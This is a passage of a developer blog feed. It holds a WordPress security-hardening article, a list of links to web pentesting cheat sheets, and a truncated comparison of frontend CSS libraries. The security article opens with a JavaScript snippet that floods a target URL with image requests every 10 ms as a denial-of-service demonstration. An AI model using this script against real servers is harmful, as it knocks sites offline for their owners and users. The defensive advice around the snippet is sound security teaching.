  &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;TARGET&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="dl"&gt;""&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="c1"&gt;// ADD TARGET URI&lt;/span&gt;
  &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;URI&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;/index.php?&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;pic&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;Image&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;rand&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Math&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;floor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Math&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;random&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;10000000000000000000000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;try&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;pic&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;src&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;http://&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;TARGET&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;URI&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;rand&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;=val&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;catch&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
      &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Error in:&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;URI&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="nf"&gt;setInterval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;floodImagesXYZ&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This script demonstrates how easily a server can be overwhelmed by repeated requests. Implementing rate limiting and using tools like &lt;strong&gt;Cloudflare&lt;/strong&gt; can help absorb such attacks.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. Use Hardening Tools
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Block Unnecessary File Uploads
&lt;/h3&gt;

&lt;p&gt;If you don’t need to upload files via PHP, block that functionality to reduce vulnerabilities.  &lt;/p&gt;

&lt;h3&gt;
  
  
  Additional Hardening
&lt;/h3&gt;

&lt;p&gt;Implement server configurations and tools to mitigate common threats, such as file permission issues or vulnerable script executions.  &lt;/p&gt;




&lt;h2&gt;
  
  
  5. Manage Builder Editors Carefully
&lt;/h2&gt;

&lt;p&gt;If you’re using page builders like &lt;strong&gt;Divi&lt;/strong&gt;, &lt;strong&gt;Elementor&lt;/strong&gt;, or &lt;strong&gt;WPBakery&lt;/strong&gt;, disable hardening tools that block PHP uploads while making changes. For example, Elementor might throw errors like &lt;code&gt;the_content()&lt;/code&gt; not being present if the firewall blocks legitimate requests.  &lt;/p&gt;




&lt;h2&gt;
  
  
  6. Custom Code Best Practices
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Review Custom Code
&lt;/h3&gt;

&lt;p&gt;Always review custom scripts, widgets, and third-party integrations to ensure they’re secure.  &lt;/p&gt;

&lt;h3&gt;
  
  
  Use Development Tools
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Plugin Check Plugin&lt;/strong&gt;: For reviewing plugins before submission to the WordPress directory.
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Envato Theme Checker&lt;/strong&gt;: For ensuring theme security and compliance.
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PHPUnit&lt;/strong&gt;: For unit testing custom code.
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PHP Code Beautifier&lt;/strong&gt;: For adhering to PHP coding standards.
&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Escape Data and Validate Nonces
&lt;/h3&gt;

&lt;p&gt;Always escape output and validate nonces when sending information to prevent security breaches.  &lt;/p&gt;




&lt;h2&gt;
  
  
  7. Install a Web Application Firewall (WAF)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Use a WAF like Wordfence
&lt;/h3&gt;

&lt;p&gt;A good WAF filters out malicious traffic, prevents brute-force attacks, and safeguards against common web application vulnerabilities.  &lt;/p&gt;

&lt;h3&gt;
  
  
  Proactive Defense
&lt;/h3&gt;

&lt;p&gt;Enable active monitoring on your WAF to log and block suspicious activity.  &lt;/p&gt;




&lt;h2&gt;
  
  
  8. Leverage Cloudflare for Extra Protection
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Connect Your Site Through Cloudflare
&lt;/h3&gt;

&lt;p&gt;Cloudflare adds a layer of protection by filtering out malicious traffic before it reaches your server.  &lt;/p&gt;

&lt;h3&gt;
  
  
  DDoS Mitigation
&lt;/h3&gt;

&lt;p&gt;Cloudflare is especially useful for blocking DDoS attacks and protecting your site from traffic surges.  &lt;/p&gt;




&lt;h2&gt;
  
  
  9. Backup Regularly
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Keep Up-to-Date Backups
&lt;/h3&gt;

&lt;p&gt;Ensure you always have current backups of your files and database.  &lt;/p&gt;

&lt;h3&gt;
  
  
  Know Your Restoration Process
&lt;/h3&gt;

&lt;p&gt;Familiarize yourself with the restoration process to quickly recover your site if needed.  &lt;/p&gt;




&lt;h2&gt;
  
  
  10. Enable Two-Factor Authentication (2FA)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Use 2FA for Admin Access
&lt;/h3&gt;

&lt;p&gt;Add an extra layer of protection by enabling Two-Factor Authentication (2FA) for all admin accounts. This prevents unauthorized access even if login credentials are compromised.  &lt;/p&gt;




&lt;h2&gt;
  
  
  11. Implement reCAPTCHA for Forms and Login
&lt;/h2&gt;

&lt;h3&gt;
  
  
  reCAPTCHA v3 for Login
&lt;/h3&gt;

&lt;p&gt;Protect your login page against bot logins and brute-force attacks without disrupting the user experience.  &lt;/p&gt;

&lt;h3&gt;
  
  
  reCAPTCHA v2 for Forms
&lt;/h3&gt;

&lt;p&gt;Use reCAPTCHA v2 for contact forms, registration forms, and other user inputs to prevent spam submissions.  &lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Even with all these security measures in place, no system is 100% secure. The key is to make your website as secure as possible and remain vigilant. Regularly back up your site, monitor for vulnerabilities, and stay informed about emerging threats.  &lt;/p&gt;

&lt;p&gt;Remember, hackers don’t target businesses personally—it’s purely about money. Large businesses are often attacked the most due to their visibility and potential financial rewards. That’s why many companies offer bug bounty programs to mitigate risks further.  &lt;/p&gt;

&lt;p&gt;Stay proactive, and don’t underestimate the importance of ongoing maintenance and security.  &lt;/p&gt;




&lt;h2&gt;
  
  
  References and Further Reading
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://wordpress.org/support/article/wordpress-security/" rel="noopener noreferrer"&gt;WordPress Security Team&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://wpscan.com/" rel="noopener noreferrer"&gt;WPScan Vulnerability Database&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.cloudflare.com/ddos/" rel="noopener noreferrer"&gt;Cloudflare DDoS Protection&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.cloudflare.com/en-gb/learning/ddos/what-is-layer-7/" rel="noopener noreferrer"&gt;What is a Layer 7 DDoS Attack? - Cloudflare&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.cloudflare.com/en-gb/learning/ddos/application-layer-ddos-attack/" rel="noopener noreferrer"&gt;Application Layer DDoS Attack - Cloudflare&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.wordfence.com/" rel="noopener noreferrer"&gt;Wordfence Web Application Firewall&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://malcure.com/" rel="noopener noreferrer"&gt;Malcure Security Tools&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://nextjs.org/docs" rel="noopener noreferrer"&gt;NextJS Documentation&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://developer.wordpress.org/rest-api/" rel="noopener noreferrer"&gt;WP Rest API Handbook&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://nmap.org/" rel="noopener noreferrer"&gt;Nmap Network Scanning&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://portswigger.net/burp" rel="noopener noreferrer"&gt;BurpSuite Security Testing&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.google.com/recaptcha/" rel="noopener noreferrer"&gt;Google reCAPTCHA&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://phpunit.de/" rel="noopener noreferrer"&gt;PHPUnit Testing Framework&lt;/a&gt;
&lt;/li&gt;
&lt;/ol&gt;

</description>
      <category>webdev</category>
      <category>wordpress</category>
      <category>security</category>
      <category>php</category>
    </item>
    <item>
      <title>Compilation of Essential Web Pentesting Cheat Sheets</title>
      <dc:creator>And Go Web Solutions | AGWS</dc:creator>
      <pubDate>Mon, 02 Sep 2024 12:20:37 +0000</pubDate>
      <link>https://dev.to/agws/compilation-of-essential-web-pentesting-cheat-sheets-4bpf</link>
      <guid>https://dev.to/agws/compilation-of-essential-web-pentesting-cheat-sheets-4bpf</guid>
      <description>&lt;p&gt;This article is a curated compilation of various web penetration testing cheat sheets. The purpose is to bring together valuable resources and tools in one place, enabling efficient access to real-world examples of XSS, SQL Injection, protocol analysis, cURL commands, and more. By using this guide, you can avoid having countless tabs open and instead focus on the most relevant and useful references for web security testing.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. &lt;strong&gt;XSS (Cross-Site Scripting) Cheat Sheet&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Port Swigger&lt;/strong&gt; provides a detailed XSS cheat sheet that covers various injection techniques and bypass methods: &lt;a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet" rel="noopener noreferrer"&gt;XSS Cheat Sheet by Port Swigger&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GBHackers&lt;/strong&gt; offers a comprehensive list of 500 XSS payloads: &lt;a href="https://gbhackers.com/top-500-important-xss-cheat-sheet/" rel="noopener noreferrer"&gt;Top 500 Important XSS Cheat Sheet&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  2. &lt;strong&gt;SQL Injection Cheat Sheet&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Port Swigger&lt;/strong&gt; offers an extensive guide on SQL Injection techniques: &lt;a href="https://portswigger.net/web-security/sql-injection/cheat-sheet" rel="noopener noreferrer"&gt;SQL Injection Cheat Sheet by Port Swigger&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Invicti&lt;/strong&gt; provides another excellent resource for SQL Injection testing: &lt;a href="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet/" rel="noopener noreferrer"&gt;SQL Injection Cheat Sheet by Invicti&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Additional resources include:

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html" rel="noopener noreferrer"&gt;OWASP XSS Filter Evasion Cheat Sheet&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/gagaltotal/Bypass-WAF-SQLMAP/blob/master/Example-Bypass-WAF-SQLMAP.txt" rel="noopener noreferrer"&gt;Bypass WAF with SQLMAP&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h3&gt;
  
  
  3. &lt;strong&gt;cURL Cheat Sheet&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Devhints&lt;/strong&gt; and &lt;strong&gt;QuickRef.me&lt;/strong&gt; provide concise guides for using cURL, covering the most important commands and options:

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://devhints.io/curl" rel="noopener noreferrer"&gt;cURL Cheat Sheet by Devhints&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://quickref.me/curl.html" rel="noopener noreferrer"&gt;cURL Quick Reference&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h3&gt;
  
  
  4. &lt;strong&gt;OWASP Cheat Sheet Series&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;OWASP's comprehensive cheat sheet series covers various aspects of web security, from secure coding practices to testing methodologies: &lt;a href="https://cheatsheetseries.owasp.org/" rel="noopener noreferrer"&gt;OWASP Cheat Sheet Series&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  5. &lt;strong&gt;SSH Cheat Sheet&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;QuickRef.me&lt;/strong&gt; provides a helpful cheat sheet for SSH commands and usage tips: &lt;a href="https://quickref.me/ssh.html" rel="noopener noreferrer"&gt;SSH Cheat Sheet&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Additional Resources&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;General Web Security Protocols&lt;/strong&gt; by Mozilla: &lt;a href="https://infosec.mozilla.org/guidelines/web_security#web-security-cheat-sheet" rel="noopener noreferrer"&gt;Mozilla's Web Security Guidelines&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deobfuscation Tool&lt;/strong&gt; for JavaScript: &lt;a href="https://lelinhtinh.github.io/de4js/" rel="noopener noreferrer"&gt;De4js Deobfuscator&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Nmap Cheat Sheet&lt;/strong&gt; for network scanning and security auditing:

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.geeksforgeeks.org/nmap-cheat-sheet/" rel="noopener noreferrer"&gt;Nmap Cheat Sheet by GeeksForGeeks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/jasonniebauer/Nmap-Cheatsheet" rel="noopener noreferrer"&gt;Nmap Cheat Sheet by Jasonniebauer&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Operating System-Specific Cheat Sheets&lt;/strong&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Linux Commands Cheat Sheet&lt;/strong&gt;: &lt;a href="https://www.geeksforgeeks.org/linux-commands-cheat-sheet/" rel="noopener noreferrer"&gt;Linux Commands by GeeksForGeeks&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Debian Distributions&lt;/strong&gt;: &lt;a href="https://www.debian.org/doc/manuals/refcard/refcard" rel="noopener noreferrer"&gt;Debian Command Reference&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Arch Linux&lt;/strong&gt;: &lt;a href="https://gist.github.com/yufengwng/9cff3fc82403e3f3052d" rel="noopener noreferrer"&gt;Arch Linux Command Guide&lt;/a&gt; | &lt;a href="https://cheatography.com/oporcoranchero/cheat-sheets/linux-and-arch-commands/" rel="noopener noreferrer"&gt;Cheatography's Linux and Arch Commands&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Slackware&lt;/strong&gt;: &lt;a href="https://www.slackbook.org/html/book.html" rel="noopener noreferrer"&gt;Slackware Book&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RedHat&lt;/strong&gt;: &lt;a href="https://developers.redhat.com/cheat-sheets" rel="noopener noreferrer"&gt;RedHat Cheat Sheets&lt;/a&gt; | &lt;a href="https://access.redhat.com/rhel-cheatsheets" rel="noopener noreferrer"&gt;RHEL Cheat Sheets&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;Windows Cheat Sheets&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CMD Commands&lt;/strong&gt;: &lt;a href="https://serverspace.io/support/help/windows-cmd-commands-cheat-sheet/" rel="noopener noreferrer"&gt;Windows CMD Commands Cheat Sheet&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PowerShell&lt;/strong&gt;: &lt;a href="https://download.microsoft.com/download/2/1/2/2122f0b9-0ee6-4e6d-bfd6-f9dcd27c07f9/ws12_quickref_download_files/powershell_langref_v3.pdf" rel="noopener noreferrer"&gt;PowerShell Quick Reference&lt;/a&gt; | &lt;a href="https://github.com/ab14jain/PowerShell" rel="noopener noreferrer"&gt;PowerShell GitHub Repository&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;MacOS Terminal Commands&lt;/strong&gt;: &lt;a href="https://www.makeuseof.com/tag/mac-terminal-commands-cheat-sheet/" rel="noopener noreferrer"&gt;Mac Terminal Commands Cheat Sheet&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;

&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Conclusion&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;These cheat sheets are not just lists of commands you could obtain by using &lt;code&gt;--help&lt;/code&gt; or &lt;code&gt;-h&lt;/code&gt;. Instead, they provide practical, real-life examples and techniques that are essential for web penetration testing. This compilation aims to be a one-stop source, bringing together the most relevant information to streamline your workflow and enhance your testing efficiency.&lt;/p&gt;

</description>
      <category>security</category>
      <category>webdev</category>
      <category>webtesting</category>
      <category>linux</category>
    </item>
    <item>
      <title>Classic Front end Libraries for React</title>
      <dc:creator>And Go Web Solutions | AGWS</dc:creator>
      <pubDate>Wed, 14 Aug 2024 15:13:57 +0000</pubDate>
      <link>https://dev.to/agws/comparing-classic-popular-frontend-libraries-for-react-benefits-drawbacks-and-use-cases-b5p</link>
      <guid>https://dev.to/agws/comparing-classic-popular-frontend-libraries-for-react-benefits-drawbacks-and-use-cases-b5p</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Felbxqh0pt83nzb9j73un.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Felbxqh0pt83nzb9j73un.gif" alt="old-man-like" width="240" height="180"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Although new frontend technologies emerge daily, it's essential to revisit some classic frontend libraries, understanding their benefits and disadvantages. These libraries have set standards in the web industry and continue to be widely used today. The order below doesn't indicate superiority but is simply random.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. &lt;a href="https://getbootstrap.com/" rel="noopener noreferrer"&gt;Bootstrap 5&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Bootstrap is a comprehensive frontend toolkit offering customizable SASS and prebuilt components.&lt;/p&gt;

&lt;h3&gt;
  
  
  Advantages
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Ease of Use:&lt;/strong&gt; Simple to integrate and maintain. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dark/Light Modes:&lt;/strong&gt; Built-in support. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom Coloring:&lt;/strong&gt; Utilizes SCSS or custom CSS class names. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Large Component Library:&lt;/strong&gt; A wide range of components available. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Predefined Colors:&lt;/strong&gt; Includes warning, info, and success classes. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Low Learning Curve:&lt;/strong&gt; Easy to pick up. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Small Size:&lt;/strong&gt; Version 5.3.3 is 59.1 kB (minified) and 16.0 kB (GZIP). ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Design Tool Integration:&lt;/strong&gt; Compatible with Figma and Adobe XD using public libraries. ✅&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Disadvantages
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Overuse:&lt;/strong&gt; Commonly used, leading to similar-looking websites. ❌&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bloated Designs:&lt;/strong&gt; Potential for heavy, non-optimized design. ❌&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Limited Customizations:&lt;/strong&gt; Flexibility is somewhat restricted. ❌&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;JavaScript Dependency:&lt;/strong&gt; Includes JavaScript components (e.g., bootstrap.bundle.js) but lacks jQuery by default, though it can be added. ❌&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  2. &lt;a href="https://tailwindcss.com/" rel="noopener noreferrer"&gt;TailwindCSS&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;TailwindCSS is known for its utility-first approach, offering extensive customization.&lt;/p&gt;

&lt;h3&gt;
  
  
  Advantages
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Dark/Light Modes:&lt;/strong&gt; Supported. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ease of Use:&lt;/strong&gt; Simple to maintain. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Customizable:&lt;/strong&gt; Using CSS or SCSS. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Team-Friendly:&lt;/strong&gt; Suitable for both large and small projects. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Easy Updates:&lt;/strong&gt; Regularly updated with easy integration. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Responsive Customizations:&lt;/strong&gt; Uses classes like &lt;code&gt;sm&lt;/code&gt;, &lt;code&gt;md&lt;/code&gt;, and &lt;code&gt;lg&lt;/code&gt;. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Unique Designs:&lt;/strong&gt; Allows for creative, custom designs. ✅&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Disadvantages
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Bloated Code:&lt;/strong&gt; Can result in larger file sizes. ❌&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Complexity:&lt;/strong&gt; Harder to use for intricate designs. ❌&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Limited Customizations:&lt;/strong&gt; Requires custom JS/CSS for interactive elements. ❌&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  3. &lt;a href="https://bulma.io/" rel="noopener noreferrer"&gt;Bulma&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Bulma differs from Bootstrap and Tailwind in that it requires no CSS knowledge, yet offers similar utility.&lt;/p&gt;

&lt;h3&gt;
  
  
  Advantages
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Beginner-Friendly:&lt;/strong&gt; Easy to start with. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Predefined Colors:&lt;/strong&gt; Similar to Bootstrap but uses syntax like &lt;code&gt;is-primary&lt;/code&gt;, &lt;code&gt;is-link&lt;/code&gt;, etc. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Unique Appearance:&lt;/strong&gt; Stands out compared to Bootstrap. ✅&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Disadvantages
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Larger Size:&lt;/strong&gt; Minified version is 180 KB; GZIP is 24 KB. ❌&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No Built-in JavaScript:&lt;/strong&gt; Lacks JavaScript or jQuery for components. ❌&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  4. &lt;a href="https://ant.design/" rel="noopener noreferrer"&gt;Ant Design&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Ant Design is highly popular, especially in React projects, and is used by companies like Tailwind.&lt;/p&gt;

&lt;h3&gt;
  
  
  Advantages
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Flexibility:&lt;/strong&gt; Highly adaptable. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Modern &amp;amp; Elegant:&lt;/strong&gt; Offers a look similar to Material Design. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Minimalistic Style:&lt;/strong&gt; Utilizes CSS-in-JS for dynamic theming and better performance. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mobile Friendly:&lt;/strong&gt; Includes mobile-specific components. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Design Tool:&lt;/strong&gt; Comes with its own design tool called "Kitchen." ✅&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Disadvantages
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Framework-Specific:&lt;/strong&gt; Officially supports only React, Vue, and Angular. ❌&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Creativity Limitation:&lt;/strong&gt; Prioritizes enterprise-level projects over creative freedom. ❌&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  5. &lt;a href="https://mui.com/" rel="noopener noreferrer"&gt;Material UI&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;Material UI is known for its aesthetically pleasing design, ideal for enterprise applications.&lt;/p&gt;

&lt;h3&gt;
  
  
  Advantages
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Visually Appealing:&lt;/strong&gt; Offers a clean, modern design. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Premade Templates:&lt;/strong&gt; Comes with ready-to-use templates. ✅&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Design Tool Integration:&lt;/strong&gt; Compatible with Figma and Adobe XD. ✅&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
